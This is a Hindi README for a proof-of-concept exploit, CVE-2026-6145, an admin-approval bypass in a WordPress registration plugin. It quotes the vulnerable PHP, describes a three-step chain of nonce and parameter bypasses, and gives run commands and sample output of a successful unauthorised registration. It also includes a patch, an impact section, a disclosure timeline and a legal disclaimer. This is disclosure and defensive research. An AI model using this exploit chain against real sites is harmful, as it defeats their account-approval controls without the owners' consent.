
User Registration & Membership <= 5.1.5 - 'action' पैरामीटर के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक अनुमोदन बाईपास हेतु अनधिकृत पहुँच की कमी
CVE-2026-6145 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress के User Registration & Membership प्लगइन (≤ 5.1.5) में एक लापता प्राधिकरण भेद्यता है, जो अनधिकृत हमलावरों को नए खाते बनाते समय एडमिन अनुमोदन आवश्यकता को बायपास करने की अनुमति देती है।
| CVE आईडी | CVE-2026-6145 |
| CNA | Wordfence |
| भेद्यता | लापता प्राधिकरण — एडमिन अनुमोदन बाईपास |
| CWE | CWE-862 (लापता प्राधिकरण) |
| CVSS 3.1 | 5.3 मध्यम (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) |
| प्रभावित | WordPress के लिए User Registration & Membership — सभी संस्करण ≤ 5.1.5 |
| पैच किया गया | संस्करण > 5.1.5 |
| शोधकर्ता | Anthony Cihan — आक्रामक सुरक्षा प्रमुख, Obviam |
| प्रकटीकरण | Wordfence जिम्मेदार प्रकटीकरण कार्यक्रम |
| प्रकाशित | 2026-05-14 |
includes/class-ur-user-approval.php में is_admin_creation_process() विधि एकमात्र द्वार है जो यह निर्धारित करती है कि नए पंजीकरण को व्यवस्थापक द्वारा आरंभिक निर्माण माना जाना चाहिए या नहीं। जब यह विधि true लौटाती है, तो दो दुष्प्रभाव उत्पन्न होते हैं:
set_user_status() नए उपयोगकर्ता की स्थिति को APPROVED पर सेट करता है, लंबित-अनुमोदन कतार को छोड़ देता है।send_request_notification_to_admin() नए पंजीकरण के लिए एडमिन अधिसूचना ईमेल को दबा देता है।यह विधि स्वयं, संस्करण 5.1.5 में, कोई प्रमाणीकरण, प्राधिकरण, या nonce सत्यापन नहीं करती है:
// includes/class-ur-user-approval.php:459-461
protected function is_admin_creation_process() {
return ( isset( $_REQUEST['action'] ) && 'createuser' == $_REQUEST['action'] );
}
चूँकि $_REQUEST $_GET, $_POST, और $_COOKIE को मर्ज करता है, एक अनधिकृत हमलावर पंजीकरण फ़ॉर्म सबमिशन के URL में ?action=createuser जोड़कर इस जाँच को संतुष्ट कर सकता है। फिर प्लगइन खाते को स्वतः-अनुमोदित कर देता है और व्यवस्थापक को कभी सूचित नहीं करता है।
जबकि CVE-2026-6145 विशेष रूप से is_admin_creation_process() में लापता प्राधिकरण को संबोधित करता है, एक कठोर पंजीकरण फ़ॉर्म के खिलाफ पूर्ण अनधिकृत शोषण के लिए इसे उसी प्लगइन संस्करण की दो सहायक समस्याओं के साथ जोड़ने की आवश्यकता होती है, जिन्हें शामिल PoC स्वचालित रूप से संभालता है:
परिणाम: एक पूर्णतः अनुमोदित उपयोगकर्ता खाता, जो व्यवस्थापक की सहभागिता या अधिसूचना के बिना बनाया गया, ऐसी साइट पर जो नए पंजीकरणों के लिए स्पष्ट रूप से एडमिन अनुमोदन की आवश्यकता रखती है।
requests लाइब्रेरीdata-form-id के रूप में फ़ॉर्म के पृष्ठ स्रोत में दिखाई देती है)git clone https://github.com/<your-username>/CVE-2026-6145.git
cd CVE-2026-6145
pip install requests
python3 poc_admin_approval_bypass.py <target_url> <form_id>
उदाहरण:
python3 poc_admin_approval_bypass.py http://wp.example.lab 7
======================================================================
User Registration v5.1.4 - Admin Approval Bypass PoC
CVE: 2026-6145 | CWE-862
Affects: User Registration & Membership <= 5.1.5
======================================================================
[*] Target: http://wp.example.lab
[*] Form ID: 7
[*] STEP 1: Obtaining nonce via unauthenticated AJAX endpoint
[+] SUCCESS: Got valid nonce for form 7: a1b2c3d4e5
[*] STEP 2: Registering user with admin approval bypass
Username: poc_bypass_1747249200
Email: [email protected]
[+] Registration request processed (HTTP 200)
[*] STEP 3: Verifying user was created
[+] CONFIRMED: User 'poc_bypass_1747249200' exists in the database
======================================================================
RESULTS
======================================================================
Unauthenticated Nonce Generation: CONFIRMED
AJAX Nonce Bypass: CONFIRMED
Admin Approval Bypass (CVE-...): CONFIRMED
[!] User was created with AUTO-APPROVED status
[!] Admin was NOT notified of this registration
======================================================================
PoC चलाने के बाद, wp-admin में लॉग इन करें और Users → All Users जाँचें:
जिन WordPress साइटों पर अवांछित खाता निर्माण के खिलाफ प्राथमिक द्वार के रूप में एडमिन अनुमोदन का उपयोग किया जाता है — जैसे सदस्यता साइटें, गेटेड समुदाय, आंतरिक पोर्टल, B2B प्लेटफ़ॉर्म, और पहुँच से पहले पहचान सत्यापन की आवश्यकता वाली कोई भी साइट — यह भेद्यता उस नियंत्रण को चुपचाप निष्प्रभावी कर देती है। विशिष्ट परिणामों में शामिल हैं:
CVSS स्कोर केवल अखंडता-संबंधी प्रभाव को दर्शाता है (कोई प्रत्यक्ष डेटा गोपनीयता हानि या सेवा व्यवधान नहीं), लेकिन वास्तविक दुनिया का प्रभाव इस बात पर निर्भर करता है कि प्रभावित साइट अनुमोदन वर्कफ़्लो पर सुरक्षा सीमा के रूप में कितनी दृढ़ता से निर्भर करती है।
| संस्करण | स्थिति |
|---|---|
| ≤ 5.1.5 | असुरक्षित |
| > 5.1.5 | पैच किया गया |
Users → All Users का ऑडिट करें। उन खातों पर विशेष ध्यान दें जिनके लिए कोई संबंधित एडमिन अधिसूचना ईमेल नहीं है।असुरक्षित विधि को क्षमता जाँच और एक मान्य nonce दोनों की आवश्यकता होनी चाहिए:
protected function is_admin_creation_process() {
return current_user_can( 'create_users' )
&& isset( $_REQUEST['action'] )
&& 'createuser' === $_REQUEST['action']
&& isset( $_REQUEST['_wpnonce_create-user'] )
&& wp_verify_nonce(
wp_unslash( $_REQUEST['_wpnonce_create-user'] ),
'create-user'
);
}
| दिनांक | घटना |
|---|---|
| 2026-03-09 |
इस प्लगइन के प्राधिकरण मॉडल पर नज़र रखने वाले शोधकर्ता निम्नलिखित में भी रुचि ले सकते हैं:
register_member के माध्यम से प्रमाणीकरण बाईपास (≤ 5.1.2)शोध, खोज, और PoC विकास:
Anthony Cihan आक्रामक सुरक्षा प्रमुख — Obviam
यदि आप इस कार्य का संदर्भ देते हैं, तो कृपया Anthony Cihan / Obviam को श्रेय देते हुए CVE-2026-6145 का उल्लेख करें।
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल रक्षात्मक अनुसंधान, डिटेक्शन इंजीनियरिंग, और अधिकृत सुरक्षा परीक्षण के लिए प्रकाशित किया गया है। यह सहायता के लिए अभिप्रेत है:
मूल शोध एक अधिकृत प्रयोगशाला वातावरण में हस्ताक्षरित समझौते के तहत किया गया था, जिसमें सार्वजनिक रिलीज़ से पहले Wordfence जिम्मेदार प्रकटीकरण कार्यक्रम के माध्यम से विक्रेता को समन्वयित प्रकटीकरण किया गया था।
इस PoC को किसी ऐसी प्रणाली के विरुद्ध चलाना जो आपकी नहीं है या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है, अवैध है — यह अमेरिकी कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (18 U.S.C. § 1030), ब्रिटिश कंप्यूटर दुरुपयोग अधिनियम 1990, यूरोपीय संघ निर्देश 2013/40/EU, और अधिकांश क्षेत्राधिकारों में समकक्ष विधान के तहत अवैध है। लेखक और Obviam इस कोड के दुरुपयोग के लिए सभी दायित्व अस्वीकार करते हैं।
इस रिपॉजिटरी का उपयोग करके आप स्वीकार करते हैं कि आपने इन शर्तों को पढ़ लिया है, समझ लिया है, और स्वीकार कर लिया है।
MIT License के अंतर्गत जारी। उपरोक्त श्रेय अनुभाग के अनुसार श्रेय देना आवश्यक है।
| चरण | समस्या | उद्देश्य |
|---|
| 1 | user_registration_get_recent_nonce wp_ajax_nopriv एंडपॉइंट के माध्यम से अनधिकृत nonce उत्पादन (केवल Referer जाँच) | प्रमाणित सत्र के बिना एक मान्य ur_frontend_form_nonce प्राप्त करें |
| 2 | फ़ॉर्म हैंडलर में ur_fallback_submit गैर-रिक्त होने पर AJAX nonce जाँच बाईपास | मान्य AJAX referer के बिना फ़ॉलबैक पथ के माध्यम से पंजीकरण सबमिट करें |
| 3 | CVE-2026-6145 — $_REQUEST में action=createuser is_admin_creation_process() को true कर देता है | नए खाते को स्वतः-अनुमोदित करें और एडमिन अधिसूचना दबाएँ |
| प्लगइन v5.1.4 के अधिकृत सुरक्षा ऑडिट के दौरान भेद्यता की पहचान की गई |
| 2026-03-09 | प्रारंभिक रिपोर्ट Wordfence जिम्मेदार प्रकटीकरण कार्यक्रम को प्रस्तुत की गई |
| 2026-04-12 | CVE-2026-6145 को Wordfence (CNA) द्वारा आरक्षित किया गया |
| 2026-05-14 | विक्रेता पैच संस्करण प्रकाशित; CVE-2026-6145 प्रकाशित |
| 2026-05-14 | यह PoC सार्वजनिक सलाह के साथ समन्वयित रूप से जारी किया गया |